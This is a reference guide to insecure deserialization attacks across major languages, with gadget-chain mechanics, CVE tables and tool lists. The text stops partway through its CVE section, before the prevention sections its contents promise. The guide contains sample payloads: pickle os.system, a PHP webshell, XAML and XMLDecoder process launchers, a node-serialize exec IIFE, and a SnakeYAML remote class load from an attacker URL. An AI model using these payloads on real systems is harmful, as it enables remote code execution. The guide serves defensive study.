Comprehensive Insecure Deserialization Guide

A practitioner’s reference for insecure deserialization — language-specific attack surface, gadget chain mechanics, real-world CVE chains, tools, and detection/prevention. Compiled from 47 research sources.

Fundamentals
Attack Surface & Entry Points
Java Deserialization
PHP Object Injection
Python Pickle & ML Pipelines
.NET Deserialization
Ruby Marshal & YAML
Node.js Deserialization
YAML & JSON Format Attacks
Gadget Chains Explained
Real-World CVEs & Exploitation Chains
Tools & Automation
Detection & Static Analysis
Prevention & Mitigation
Signature & Gadget Quick Reference

1. Fundamentals

Insecure deserialization occurs when an application reconstructs program objects from attacker-controlled data without sufficient validation. Serialization converts an in-memory object graph to a byte stream for storage or transit; deserialization reverses the process. The danger is that most native serialization formats are not just data — they are instructions for how to rebuild arbitrary objects, including which classes to instantiate and which methods (constructors, magic methods, callbacks) to run along the way.

Three broad impact classes:

Class	Description	Canonical Example
Remote Code Execution	Attacker reaches a native sink (`Runtime.exec`, `os.system`, `eval`, `system()`) through a gadget chain	Java CommonsCollections → `Runtime.exec`
Object Injection / Logic Abuse	Attacker smuggles an unexpected object type that alters control flow, writes files, or performs SQLi	PHP `__destruct` → `file_put_contents` shell upload
Denial-of-Service	Recursive object graphs, billion-laughs, hash collision, resource exhaustion	SnakeYAML billion-laughs, Java `HashMap` hash DoS

Why it persists: the vulnerability is in data, not code. The sink (readObject, unserialize, pickle.loads, Marshal.load, BinaryFormatter.Deserialize) looks correct in isolation; the bug is the trust boundary around what reaches it. Static analyzers flag the call but cannot reason about whether the bytes arriving were produced by trusted code.

The gadget chain abstraction: RCE is rarely achieved in a single hop. Instead, attackers assemble a graph of “gadgets” — legitimate classes already on the application classpath that, when deserialized in a particular shape, cause method dispatch to cascade until a dangerous sink is reached. The application doesn’t need to ship malicious code; it only needs to load a library that contains usable gadgets.

Key insight: you cannot patch your way out of this. Every patched gadget chain is followed by another built from different links on the same classpath. The only durable fix is to eliminate native deserialization of untrusted input entirely.

2. Attack Surface & Entry Points

Where serialized blobs cross trust boundaries

Category	Examples
HTTP parameters	Base64-encoded `state`, `token`, `data`, `session`, `view`, `cache` params
Cookies	Session cookies, `remember_me`, flash messages, CSRF tokens encoding objects
Hidden form fields	ASP.NET `__VIEWSTATE`, Rails `_session_id`, JSF `javax.faces.ViewState`
Cache layers	Memcached/Redis blobs, Rails cache store with Marshal, Django pickle sessions
Message queues	RabbitMQ, Kafka, ActiveMQ, SQS, ZeroMQ payloads between services
RMI / RPC	Java RMI registry, JMX, JNDI, CORBA, DRb
File uploads	`.ser`, `.rdb`, `.pkl`, `.joblib`, `.pt`, `.phar` model/checkpoint files
WebSockets / IPC	Distributed serving frameworks passing pickle or Marshal over sockets
Email headers	`X-SerializedObject` style custom headers, WSDL SOAP bodies
Log ingestion	Log4j-style object injection, Graylog inputs, serialized stack traces
Database columns	Opaque `BLOB`/`bytea` fields holding serialized objects

Sink functions by language

Java:     ObjectInputStream.readObject(), XMLDecoder.readObject(),
          XStream.fromXML(), Yaml.load() (SnakeYAML),
          Jackson ObjectMapper with enableDefaultTyping(),
          Kryo.readObject(), Hessian, Castor, Burlap
PHP:      unserialize(), phar:// wrapper (file ops trigger), yaml_parse(),
          Laminas Zend_Serializer, Symfony Serializer XML
Python:   pickle.loads/load, cPickle, joblib.load, torch.load,
          numpy.load(allow_pickle=True), pyyaml yaml.load (unsafe),
          shelve, dill.loads, marshal.loads, jsonpickle.decode
.NET:     BinaryFormatter.Deserialize, SoapFormatter, LosFormatter,
          ObjectStateFormatter, NetDataContractSerializer,
          JavaScriptSerializer (TypeNameHandling),
          Json.NET with TypeNameHandling != None, DataContractSerializer,
          XmlSerializer with arbitrary types
Ruby:     Marshal.load, YAML.load (pre-Psych 4), JSON.parse(create_additions:true),
          Oj.load (default mode), Rails cache store :marshal
Node.js:  node-serialize unserialize(), funcster, serialize-javascript
          (with IIFE), eval-based JSON revivers

Content-type & magic byte fingerprints

Format	Signature	Notes
Java serialized	`AC ED 00 05` (`rO0` base64)	`ObjectOutputStream` header
PHP serialized	`O:<num>:"ClassName":<num>:{...}`	Also `a:`, `s:`, `i:` primitives
Python pickle	`80 04` / `80 05` (proto 4/5)	Starts with PROTO opcode
.NET BinaryFormatter	`00 01 00 00 00 FF FF FF FF`	`SerializationHeaderRecord`
Ruby Marshal	`04 08`	Major 4, minor 8
ASP.NET ViewState	`/wEP`, `/wEX` base64 prefix	Deserialized server-side
Phar	`<?php __HALT_COMPILER();` manifest	PHP-parsed metadata

3. Java Deserialization

The core primitive

Any class implementing java.io.Serializable can be reconstructed by ObjectInputStream.readObject(). A class may define a private readObject(ObjectInputStream in) method that is invoked during deserialization — this is where custom logic runs, and it is the primary entry ramp for gadget chains.

ObjectInputStream ois = new ObjectInputStream(request.getInputStream());
Object obj = ois.readObject();   // attacker-controlled byte stream

The default readObject will happily deserialize any class on the classpath that implements Serializable. There is no type filter. The “expected type” cast ((User) ois.readObject()) happens after the object graph is fully reconstructed and all side effects have fired.

Classic sink entry points

Sink	Library	Notes
`ObjectInputStream.readObject`	JDK core	Foundation of all classic Java deserialization bugs
`XMLDecoder.readObject`	`java.beans`	Pure XML RCE; constructor chains via `<object class=...>`
`XStream.fromXML`	XStream	Whitelist-by-default only since v1.4.18
`Yaml.load`	SnakeYAML (<2.0)	Instantiates arbitrary classes from `!!` tags
`ObjectMapper.readValue` + `enableDefaultTyping`	Jackson	Polymorphic deserialization via `@class` hints
`Kryo.readObject` / `readClassAndObject`	Kryo	Default config registers arbitrary classes
`Hessian.getInputStream`	Hessian/Burlap	Used in older Spring Remoting, Caucho
`JNDI lookup`	JNDI/LDAP/RMI	Log4Shell’s cousin — remote class loading

Gadget chain anatomy (CommonsCollections1)

The canonical chain, dissected from ysoserial’s CommonsCollections1.java, illustrates the building blocks seen in almost every Java chain:

Entry gadget (readObject trigger). sun.reflect.annotation.AnnotationInvocationHandler has a readObject method that calls memberValues.entrySet(). If memberValues is a dynamic Proxy backed by another AnnotationInvocationHandler, entrySet() routes through InvocationHandler.invoke().
Bridge gadget (method dispatch). The inner AnnotationInvocationHandler.invoke() calls memberValues.get(name). When memberValues is a LazyMap, get() invokes the map’s factory.transform(key) for missing keys.
Transform chain (ChainedTransformer). A ChainedTransformer pipes the initial input through an array of Transformer instances, each feeding the next:
- ConstantTransformer(Runtime.class) — returns the Runtime class object
- InvokerTransformer("getMethod", ..., {"getRuntime", new Class[0]}) — reflectively fetches the getRuntime method
- InvokerTransformer("invoke", ..., {null, new Object[0]}) — invokes it, returning a Runtime instance
- InvokerTransformer("exec", ..., execArgs) — finally calls Runtime.exec(cmd)

The sink is reached not by any single class being malicious, but by abusing reflection primitives exposed in a widely-used utility library.

Why patching individual gadgets fails

The AnnotationInvocationHandler entry was patched in JDK 8u72 — memberValues must now be a LinkedHashMap. But LazyMap, InvokerTransformer, and ChainedTransformer live in commons-collections and are not part of the JDK. CommonsCollections5 reused the same backend chain but substituted a new entry ramp (BadAttributeValueExpException.readObject calling toString() on an arbitrary object). The backend survived; only the front door changed.

This is the defining pattern of Java deserialization defense: you cannot remove the gadgets (they’re in third-party jars), you cannot remove the sink (it’s in the JDK), and every patched entry is followed by another discovered entry reusing the same backend.

Well-known gadget chain families (ysoserial)

Chain	Trigger	Backend	Requires
`CommonsCollections1`	`AnnotationInvocationHandler.readObject`	LazyMap + ChainedTransformer	commons-collections 3.1, JDK ≤ 8u71
`CommonsCollections2`	`PriorityQueue.readObject` → `compare`	`TransformingComparator`	commons-collections4 4.0
`CommonsCollections5`	`BadAttributeValueExpException.readObject` → `toString`	LazyMap	commons-collections 3.1, any JDK
`CommonsCollections6`	`HashSet.readObject` → `hashCode`	LazyMap	commons-collections 3.1, any JDK
`CommonsBeanutils1`	`PriorityQueue` → `BeanComparator`	`PropertyUtils.getProperty` → reflection	commons-beanutils
`Groovy1`	`ConvertedClosure.invoke`	`MethodClosure("execute")`	Groovy ≤ 2.4.3
`Spring1`, `Spring2`	`ObjectFactory` proxy chains	JDK only + spring-core	Older Spring
`Hibernate1`, `Hibernate2`	`ComponentType.getPropertyValue`	JDK reflection	Hibernate
`JRMPClient` / `JRMPListener`	RMI remote class loading	Outbound JRMP callback	Network egress
`URLDNS`	`HashMap.readObject` → `URL.hashCode`	DNS lookup	Useful as blind probe (no RCE)
`ROME`, `Click1`, `Clojure`, `JBossInterceptors1`, `C3P0`, `MozillaRhino1`, `Myfaces1`, `Wicket1`	Various	Various	Application-specific

SnakeYAML (CVE-2022-1471)

Before SnakeYAML 2.0, Yaml.load() was effectively equivalent to calling ObjectInputStream.readObject for any class on the classpath. YAML tags like !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://attacker/"]]]] could instantiate a ScriptEngineManager pointed at a remote META-INF/services file, loading arbitrary code via JAR SPI. The maintainers initially declined to change defaults, arguing documentation was sufficient — eight CVEs later, 2.0 finally made SafeConstructor the default.

Jackson polymorphic deserialization

Jackson is safe when deserializing fixed types. It becomes dangerous when ObjectMapper.enableDefaultTyping() is set or classes use @JsonTypeInfo(use = Id.CLASS). The JSON then carries a @class (or @type) hint telling Jackson which concrete class to instantiate, converting a JSON endpoint into an arbitrary gadget instantiation primitive. Blocklists (SubTypeValidator) are maintained by Jackson maintainers but have been bypassed repeatedly.

4. PHP Object Injection

The `unserialize()` primitive

PHP’s serialize()/unserialize() encode the class name, property names, and property values of any object. On deserialization, PHP instantiates the named class with the encoded property values directly assigned — the constructor is not invoked. Instead, specific “magic methods” fire automatically:

Magic Method	When It Fires
`__wakeup()`	Immediately after unserialization
`__destruct()`	When the object is garbage collected (end of request)
`__toString()`	When the object is cast to string (comparisons, echo, string concat)
`__call()`	When an undefined method is invoked
`__get()` / `__set()`	When undefined properties are accessed
`__invoke()`	When the object is called as a function
`__unserialize()` (PHP 7.4+)	Replaces `__wakeup` if defined

Serialized string format

O:12:"LoggingClass":2:{s:8:"filename";s:9:"shell.php";s:7:"content";s:20:"<?php evilCode(); ?>";}

O:12:"LoggingClass" — object of class LoggingClass (name length 12)
2:{...} — two properties
s:8:"filename" — string key of length 8
s:9:"shell.php" — string value of length 9

Property-Oriented Programming (POP) chains

Like Java gadget chains, but chained through PHP magic methods and method calls in class __destruct / __wakeup / __toString hooks. The Sonar example illustrates the minimal case — a LoggingClass whose destructor writes $this->content to $this->filename. An attacker serializes an instance with filename = "shell.php" and content = "<?php system($_GET[0]); ?>", and the destructor drops a webshell at request end.

Real POP chains are longer. Typical primitives:

A destructor that calls $this->obj->method() where $this->obj is another attacker-chosen class
A __toString that builds a SQL query or file path from properties
A __wakeup that calls eval, include, or file_put_contents on serialized properties
A __call that forwards to call_user_func_array($this->callback, $this->args)

PrestaShop, Drupal (CVE-2019-6340), Joomla, Magento, WordPress core, Pydio, phpBB, and SuiteCRM all had disclosed POP chains reaching RCE.

Phar deserialization (pre-PHP 8)

A subtle variant: PHP’s phar:// stream wrapper parses PHAR metadata via unserialize() when any file operation (including file_exists, filesize, is_dir) touches a PHAR file path. An attacker who can:

Upload a file of any extension containing PHAR metadata (the PHAR format tolerates arbitrary headers — JPEG EXIF, GIF comments, etc.)
Trigger a file operation on phar://uploads/avatar.jpg/foo

…reaches unserialize without ever calling it directly. The avatar upload path becomes an RCE. PHP 8.0 removed implicit metadata unserialization; earlier versions remain exposed.

Common PHP deserialization entry points

Laravel cookie encryption (when APP_KEY leaks, serialized payloads pass integrity)
WooCommerce and WordPress meta fields stored as serialized PHP
Yii restoreGET, CodeIgniter session library (with encryption disabled)
Symfony Cookie / State components in older versions
Legacy Zend Framework Zend_Serializer

5. Python Pickle & ML Pipelines

Pickle is a stack VM, not a data format

pickle.loads() executes a small stack-based virtual machine. One of its opcodes, REDUCE, pops a callable and an argument tuple from the stack and calls them. Any object that defines __reduce__() returning (callable, args) becomes a function call when loaded:

class P:
    def __reduce__(self):
        return (os.system, ("id",))
pickle.dumps(P())   # -> bytes that call os.system("id") on load

There is no blocklist, no sandbox, no way to intercept the call. The Python docs warn about this in a yellow box that approximately nobody reads because the code that loads pickle files is written by ML engineers, not security engineers.

The ML pipeline problem

Every ML tutorial ends with pickle.dump(model, f) / pickle.load(f). Higher-level libraries hide pickle under innocuous names:

Function	Actually Calls
`joblib.load(path)`	`pickle.load`
`torch.load(path)` (pre-2.6 default)	`pickle.load` over tensor data
`numpy.load(path, allow_pickle=True)`	`pickle.load`
`dill.load`	pickle with extra object support
`cloudpickle.load`	pickle with closure support
`HuggingFace transformers` older models	pickle under the hood
`ZeroMQ recv_pyobj()`	`pickle.loads` on wire bytes

A code reviewer sees joblib.load(model_path) and approves it. The reviewer does not ask where model_path came from. In a typical pipeline the file was downloaded by a training service, pushed to S3, cached by a registry, and finally loaded by inference — the chain of custody is invisible at the load site.

CVE-2025-32444 (vLLM, CVSS 10.0)

vLLM’s Mooncake integration for distributed KV-cache transfer called recv_pyobj() on ZeroMQ sockets bound to 0.0.0.0. Any host on the network could ship a pickle payload and get RCE. The code looked correct — ZMQ is a legitimate IPC mechanism and recv_pyobj is a legitimate API. The bug is that “structured message between trusted workers” silently became “unauthenticated pickle deserialization endpoint.”

LightLLM (CVE-2026-26220)

Same vulnerability class, WebSocket-based. The prefill-decode disaggregation system deserialized incoming binary frames with pickle.loads(). A nonce-based auth check existed but the default nonce was an empty string — falsy in Python, so the check was skipped. The server explicitly refused to bind to localhost, guaranteeing network exposure.

data = await websocket.receive_bytes()
obj = pickle.loads(data)   # untrusted WebSocket binary frame

There was no reason to use pickle for this — the payload was worker registration metadata (strings, ints, dicts). JSON or MessagePack would have worked fine. Pickle was the path of least resistance in Python and nobody thought about it.

PickleScan is fundamentally fragile

Picklescan (used by HuggingFace) parses pickle bytecode and matches against a blocklist of dangerous imports. The problem is architectural: pickle is Turing-complete, and parsing divergence between picklescan and PyTorch creates bypass primitives:

ZIP flag bit flipping (Sonatype) — PyTorch’s ZIP reader accepts flipped general-purpose bit flags that picklescan silently skips.
Subclass imports (JFrog) — using a subclass of a blocklisted module downgrades picklescan’s “Dangerous” verdict to “Suspicious” while still executing fine.
Non-standard file extensions — loader accepts it, scanner ignores it.
Gadget diversity — academic research (PickleBall / Brown University CCS 2025) identified 133 exploitable function gadgets across stdlib and common ML deps, achieving near-100% scanner bypass.

Even the best-performing scanner in the PickleBall study let 89% of gadgets through. This is not fixable within the current approach.

torch.load: incomplete migration

Before PyTorch 2.0, torch.load(path) unpickled the entire checkpoint with no restrictions. 2.0 added weights_only=True; 2.6 finally changed the default. But the installed base of unsafe patterns is enormous — old tutorials, copy-pasted notebooks, and vendor scripts that pin PyTorch to earlier versions still exist in production.

Rule for review: torch.load() without weights_only=True is a finding unless the checkpoint source is fully trusted internal infrastructure with integrity verification.

Supply-chain vector

Model weights are distributed as files. A 2025 Brown University study found roughly half of popular HuggingFace repositories still contain pickle-backed models, including releases from Meta, Google, Microsoft, NVIDIA, and Intel. Attack patterns:

Compromised account — push new weights, every downstream pull runs the payload
Typosquatting — bert-base-uncased vs bert_base_uncased
Malicious fine-tunes — functional model with payload in serialization wrapper
Tensor steganography — hiding callable references in weight perturbations small enough not to affect accuracy

PyYAML’s `yaml.load`

yaml.load(data) without an explicit Loader defaults to FullLoader in modern PyYAML, which disallows arbitrary Python object construction. But enormous amounts of legacy code pass Loader=yaml.Loader (the unsafe loader) or use pre-5.1 versions where the default was unsafe. The canonical payload:

!!python/object/apply:os.system ["id"]

Docling RCE (CVE-2026-24009) — a shadow vulnerability introduced into Docling via an unpinned PyYAML version that regressed to accepting arbitrary tags in one code path. The fix was to switch to yaml.safe_load unconditionally.

6. .NET Deserialization

The dangerous formatters

.NET ships with multiple serialization APIs; some are safe, several are explicitly marked insecure:

Formatter	Status	Notes
`BinaryFormatter`	Insecure	Microsoft: “cannot be made secure”; obsoleted in .NET 5+
`SoapFormatter`	Insecure	Same type-loading model as BinaryFormatter
`NetDataContractSerializer`	Insecure	Preserves .NET types, loads arbitrary
`ObjectStateFormatter`	Insecure	ASP.NET ViewState backend
`LosFormatter`	Insecure	Legacy ASP.NET
`JavaScriptSerializer` with `SimpleTypeResolver`	Insecure	Allows `__type` hints
`Json.NET` with `TypeNameHandling != None`	Dangerous	`$type` property instantiates arbitrary classes
`XmlSerializer` with unrestricted types	Dangerous	Requires declared types at compile time; safer if constrained
`DataContractSerializer`	Safer	Known-types list enforced
`System.Text.Json`	Safe (default)	No polymorphic default

Microsoft’s official guidance: “BinaryFormatter is insecure and can’t be made secure.” Period. There is no allowlist configuration that makes it safe against untrusted input.

Sink patterns

// Classic vulnerable pattern
var fmt = new BinaryFormatter();
var obj = fmt.Deserialize(request.InputStream);   // RCE

// Json.NET danger
var settings = new JsonSerializerSettings {
    TypeNameHandling = TypeNameHandling.All   // or Objects/Arrays
};
var obj = JsonConvert.DeserializeObject<object>(json, settings);

Known .NET RCE gadget families (ysoserial.net)

Gadget	Works Against	Notes
`TypeConfuseDelegate`	BinaryFormatter, LosFormatter, ObjectStateFormatter, NetDataContractSerializer	Sorts a list with a `MulticastDelegate` confused into calling `Process.Start`
`ActivitySurrogateSelector`	BinaryFormatter, SoapFormatter	Abuses surrogate selector to compile and run C# at deserialization time
`ActivitySurrogateSelectorFromFile`	Same	Variant that loads an assembly from disk
`WindowsIdentity`	BinaryFormatter, NetDataContractSerializer	Uses `WindowsIdentity` deserialization callback
`RolePrincipal`	Same	Security principal gadget
`DataSet`	BinaryFormatter, SoapFormatter, XmlSerializer with DataSet	`System.Data.DataSet` XML type confusion
`SessionSecurityToken`	Json.NET, NetDataContractSerializer	WIF token gadget
`ObjRef` (TransparentProxy)	Remoting	`.NET Remoting` cross-AppDomain trick
`TextFormattingRunProperties`	Json.NET	XAML-embedded `ObjectDataProvider` reach to `Process.Start`
`PSObject`	BinaryFormatter	PowerShell object gadget

XAML `ObjectDataProvider` — the universal .NET gadget

The System.Windows.Data.ObjectDataProvider class takes a target type, a method name, and method parameters, and invokes them. Any formatter that can reach XAML parsing (directly or via TextFormattingRunProperties, via XamlReader.Parse, or via Json.NET’s XAML types) can achieve RCE with a single object. It’s the .NET equivalent of InvokerTransformer.

<ResourceDictionary xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
                    xmlns:s="clr-namespace:System;assembly=mscorlib"
                    xmlns:c="clr-namespace:System.Diagnostics;assembly=system">
  <ObjectDataProvider x:Key="x" ObjectType="{x:Type c:Process}" MethodName="Start">
    <ObjectDataProvider.MethodParameters>
      <s:String>cmd.exe</s:String>
      <s:String>/c calc</s:String>
    </ObjectDataProvider.MethodParameters>
  </ObjectDataProvider>
</ResourceDictionary>

ASP.NET ViewState

ViewState is a base64-encoded blob sent in a hidden __VIEWSTATE form field carrying page control state. It is deserialized server-side by ObjectStateFormatter. Protection relies on <machineKey> HMAC validation (when enabled) and encryption. Leak or brute-force of machineKey turns ViewState into an unauthenticated RCE sink — ysoserial.net’s TextFormattingRunProperties gadget is the canonical payload.

This is exactly the attack surface behind the SharePoint ToolShell campaign (CVE-2025-53770) and related CVE-2021-27076 “replay-style” attack. A custom webshell parses parameters from VIEWSTATE, enabling insecure deserialization against on-prem SharePoint. Over 4,600 compromise attempts against 300+ organizations were observed in one week of July 2025.

Defensive must-do: rotate ASP.NET machine keys; enable ValidationMode="3.5" and MAC validation; do not disable ViewState MAC.

Notable .NET deserialization CVEs

CVE	Product	Formatter
CVE-2020-25258	Hyland OnBase	BinaryFormatter
CVE-2021-27076	SharePoint (replay-style)	ObjectStateFormatter/ViewState
CVE-2021-29508	Wire (Proto.Actor)	BinaryFormatter
CVE-2022-21969	Exchange Server	BinaryFormatter via MAPI
CVE-2023-3513	Razer Central Service	BinaryFormatter IPC
CVE-2023-5914	CentralSquare	BinaryFormatter
CVE-2023-6184	Third-party ASP.NET app	ViewState
CVE-2025-53770	SharePoint (ToolShell)	ViewState
CVE-2026-20963	SharePoint	Deserialization RCE
CVE-2026-26114	SharePoint	Deserialization RCE

7. Ruby Marshal & YAML

`Marshal.load` — a decade of whack-a-mole

Ruby’s Marshal module is the language’s native binary serialization format. Passing any untrusted bytes to Marshal.load should be treated as arbitrary code execution. The vulnerability was first publicly discussed in a 2013 Ruby bug tracker issue by Charlie Somerville (now Hailey) and has resisted fixes ever since.

class UserRestoreController < ApplicationController
  def show
    user_data = params[:data]
    deserialized = Marshal.load(Base64.decode64(user_data))
    render plain: "Restored: #{deserialized.inspect}"
  end
end

Gadget chain timeline

Year	Gadget / Technique	Target
2013	Initial Marshal warning issue	Ruby 2.0
2016	Phrack #69 — Rails 3/4 Marshal exploit	Rails ≤ 4.0
2018	Luke Jahnke — “Ruby 2.x Universal RCE Deserialization Gadget Chain” (elttam)	Ruby 2.x
2019	CVE-2019-5420 (Rails 5.2 Marshal)	Rails 5.2
2019	Etienne Stalmans — YAML.load universal RCE	Ruby 2.x + Psych
2021	William Bowling — “Universal Deserialisation Gadget for Ruby 2.x–3.x”	Ruby 2.x/3.x
2022	William Bowling — “Round Two” updated gadget	Ruby 3.0/3.1
2024	Alex Leahu (Include Security) — Rails library-based chains	Rails
2024	GitHub Security Lab — JSON/XML/YAML/Marshal CodeQL queries + PoCs	Multi-format
2024	Luke Jahnke — Ruby 3.4 universal RCE + Gem::SafeMarshal escape	Ruby 3.4-rc1

The pattern: each patch closes one reachable entry from readObject-equivalent, the gadget backend survives, researchers find another entry, repeat. Ruby 3.1 made YAML’s safe_load the default (via Psych 4). Ruby 3.2 patched Marshal gadgets. Ruby 3.4 was released with yet another chain barely averted.

The Gem::SpecFetcher → Runtime chain (2024)

The current canonical Ruby Marshal universal chain routes through Gem::SpecFetcher, Gem::Version, Gem::RequestSet::Lockfile, Gem::RequestSet, Gem::Resolver::SpecSpecification, Gem::Source::Git, and Gem::Resolver::GitSpecification. The chain ends in shell metacharacter expansion via a git invocation with an attacker-controlled repository name containing backticks:

any.zip → reference field contains `$(id > /tmp/pwn)` → git clone executes it

The gadget lives in RubyGems itself — core Ruby — so the only way to patch it is to change RubyGems internals. Doyensec and Trail of Bits have both found successive variants during RubyGems.org audits.

Where Marshal lurks in real apps

Rails cache store with :marshal (the default prior to Rails 7.1)
Rails session store in legacy configurations
Background job backends — Resque, Sidekiq (with Marshal coder), DelayedJob
Cookie-based flash messages in older Rails versions
DRb (distributed Ruby) — entire mechanism is Marshal over sockets
File-based Ruby object storage — .rb.cache, .marshal, .bin

YAML.load and Psych

Psych 4 (Ruby 3.1+) made YAML.load == YAML.safe_load by default. YAML.unsafe_load exists for compatibility. Pre-3.1 code calling YAML.load(user_data) is directly exploitable via !ruby/object: tags that instantiate arbitrary classes:

--- !ruby/object:Gem::Installer
  i: x

Stalmans’s 2019 chain produces ~3 KB of YAML reaching Runtime.exec-equivalent via ERB template evaluation in a Gem::Installer-chained setter.

JSON.parse(create_additions: true)

Ruby’s JSON.parse supports an opt-in mode where {"json_class": "SomeClass", ...} triggers SomeClass.json_create({...}). If any class on the load path defines a vulnerable json_create, this is an RCE path. Oj’s “default mode” enables similar behavior by default.

8. Node.js Deserialization

The `node-serialize` footgun

The npm package node-serialize serializes objects including functions — by wrapping functions as "_$$ND_FUNC$$_function () { ... }" strings and evaling them on deserialize. Passing untrusted input to serialize.unserialize() is direct RCE via IIFE:

const payload = {
  rce: "_$$ND_FUNC$$_function(){require('child_process').exec('id',function(e,s){console.log(s)});}()"
};
serialize.unserialize(JSON.stringify(payload));

The trailing () in the function string causes immediate invocation. CVE-2017-5941 covered the original disclosure; the package remains on npm with warnings.

`funcster`, `serialize-javascript`

Similar patterns; serialize-javascript is relatively safer when used to produce output for client consumption but dangerous if the output is deserialized via eval on the server with attacker control.

Prototype pollution adjacency

Node.js deserialization bugs frequently co-occur with prototype pollution (__proto__ key injection via Object.assign, lodash.merge, JSON.parse + merge). A polluted prototype can modify the behavior of deserialization functions used downstream.

YAML in Node.js

js-yaml had unsafe loading in versions prior to 4.0. yaml package default is safe. Custom schemas and CORE_SCHEMA with type handlers can reintroduce unsafe behavior.

Main sinks to grep for

serialize.unserialize(...)
funcster.deepDeserialize(...)
eval(req.body.something)
new Function(req.body.something)
vm.runInNewContext(untrusted)
js-yaml load() (pre-4.0)
node-phantom, PhantomJS IPC

9. YAML & JSON Format Attacks

YAML is not “just data”

Modern YAML parsers support typed tags (!!, !, !<...>) that trigger class instantiation in the host language:

Language	Unsafe Loader	Tag Syntax
Python (PyYAML <5.1)	`yaml.load`	`!!python/object/apply:os.system ["id"]`
Java (SnakeYAML <2.0)	`Yaml().load`	`!!javax.script.ScriptEngineManager [...]`
Ruby (Psych <4.0)	`YAML.load`	`!ruby/object:Gem::Installer`
.NET (YamlDotNet)	Untyped deserializer	`!System.Diagnostics.Process`
Go (yaml.v2 custom unmarshalers)	Type-dispatched	Typically safe unless reflective

The maintainer response pattern is often to document the danger rather than change defaults, which is why CVEs in YAML libraries keep landing.

CVE-2022-1471 (SnakeYAML)

After at least eight prior related CVEs, SnakeYAML was finally given an umbrella CVE for “insecure by default.” SnakeYAML <2.0’s Yaml().load() accepts !! tags that instantiate arbitrary Java classes. A reachable YAML parser in any Spring/Jackson/REST ingestion path becomes RCE without authentication. Fixed in 2.0 by making SafeConstructor the default.

CVE-2026-24009 (Docling RCE via PyYAML)

A shadow vulnerability: Docling indirectly loaded PyYAML in a path that used yaml.load without an explicit safe loader, regressing when a dependency pin lapsed. The attack surface was document ingestion — upload a crafted document containing a YAML manifest with !!python/object/apply, and Docling parsed it on the server.

JSON deserialization dangers

Plain JSON isn’t directly vulnerable — JSON grammar has no type tags. But:

Polymorphic deserializers (Jackson enableDefaultTyping, Json.NET TypeNameHandling, fastjson autoType) add a @class/$type/@type field that reintroduces type-driven instantiation.
jsonpickle (Python) stores Python objects in JSON and round-trips them through pickle semantics on load.
Oj (Ruby) in :object mode preserves Ruby class info.
JSON.parse in Ruby with create_additions: true dispatches to json_create.

Fastjson (Java) is a notable case: com.alibaba.fastjson.JSON.parseObject(str, Object.class) with autoType enabled has had a continuous stream of RCE chains since 2017 (JdbcRowSetImpl JNDI chain being the canonical one).

XML deserialization

XMLDecoder (Java) and XML-based formatters in .NET (SoapFormatter, XamlReader.Parse) are equivalent in power to their binary cousins. java.beans.XMLDecoder.readObject parses XML that directly specifies method invocations:

<java>
  <object class="java.lang.Runtime" method="getRuntime">
    <void method="exec">
      <string>calc</string>
    </void>
  </object>
</java>

XStream’s default configuration before 1.4.18 allowed similar arbitrary-class instantiation; dozens of CVEs (CVE-2021-21344 through CVE-2021-39154 and onward) document the gadget chain parade.

10. Gadget Chains Explained

The chain-of-method-dispatch abstraction

A gadget chain is a sequence of class method invocations connected by field references, where:

Entry gadget — a class whose readObject, __wakeup, __destruct, __reduce__, etc. is called automatically during deserialization and does something more than set fields.
Relay gadgets — classes whose methods (called by the previous gadget) make further method calls on attacker-controlled fields, propagating control flow.
Sink gadget — terminal class whose invoked method reaches a native “do something dangerous” primitive (exec, eval, system, file write, reflection invoke, HTTP request, deserialize-again).

The attacker picks an object type for each field so that the “dynamic dispatch” at each link points to the next gadget. The chain is then serialized and submitted to the sink.

Why chains exist (the Russian doll metaphor)

No sane developer writes readObject to call Runtime.exec directly. But developers write readObject methods that call this.field.someMethod(), where someMethod is an interface method. The JVM / PHP / Python runtime resolves someMethod at dispatch time based on the actual class of this.field. Swap this.field for a LazyMap or an InvokerTransformer and you’ve changed the target of the call without changing the call site.

Gadget hunting methodology

Seed set: find all classes implementing the deserializable marker (java.io.Serializable, PHP __wakeup/__destruct, Python __reduce__, .NET [Serializable]).
Entry set: filter to classes whose deserialization-time methods do more than field assignment — call any method on a field, any reflection API, any eval-equivalent.
Graph expansion: for each entry, model “what methods does this call on fields I control?” Traverse the call graph backward from known sinks (Runtime.exec, eval, system, include).
Constraint solving: each edge has type requirements (the field must be assignable to an interface that has the called method); solve for a feasible object graph.
Serializability filter: every node in the graph must itself be deserializable by the target format.

Automated gadget discovery tools

Tool	Language	Approach
Gadget Inspector	Java	Bytecode analysis; finds call-graph paths from `readObject` to sinks
JOOGIE	Java	Static data-flow analysis
SerHyBrid	Java	Hybrid static/dynamic exploration
PHPGGC	PHP	Curated chain database with generator CLI
Fickling	Python	Pickle bytecode parser, static analyzer, and gadget constructor
PickleBall	Python	Per-library policy generator, not discovery
Freddy (Burp)	Multi	Deserialization payload injector with ~30 known chains
ysoserial / ysoserial.net	Java / .NET	Payload generator for ~30 known Java chains, ~15 .NET
marshalsec	Java	Non-JDK serialization formats (Jackson, XStream, Kryo, Hessian, JYaml, Red5)
GadgetProbe	Java	DNS-based blind probing to fingerprint classpath classes

The “unpatchable” property

A gadget chain is a path through the classpath. Patching one class on the path closes that specific path but leaves every other path open. The set of gadgets on a modern enterprise Java classpath is combinatorially enormous — any library that does reflection, method dispatch on attacker-controlled fields, or custom deserialization logic is a potential source of gadgets. This is why the only durable fix is to not deserialize untrusted data in native formats.

11. Real-World CVEs & Exploitation Chains

Java

CVE	Product	Chain / Trigger
CVE-2015-4852	WebLogic T3	CommonsCollections over IIOP
CVE-2015-7501	JBoss/Jenkins	CommonsCollections via `/invoker/JMXInvokerServlet`
CVE-2016-1000031	Apache Commons FileUpload	`DiskFileItem` reflective file write
CVE-2017-5638	Struts2 (S2-045)	OGNL via Content-Type (not pure deser, related family)
CVE-2017-10271	WebLogic	XMLDecoder on WLS-wsat `/wls-wsat/CoordinatorPortType`
CVE-2018-7489	Jackson-databind	`c3p0` gadget via default typing
CVE-2019-2725	WebLogic	XMLDecoder unauthenticated RCE
CVE-2019-17571	Log4j 1.x `SocketServer`	`ObjectInputStream` on log socket
CVE-2021-44228	Log4Shell	JNDI lookup (adjacent but not pure deser)
CVE-2022-1471	SnakeYAML	`!!ScriptEngineManager` with URLClassLoader
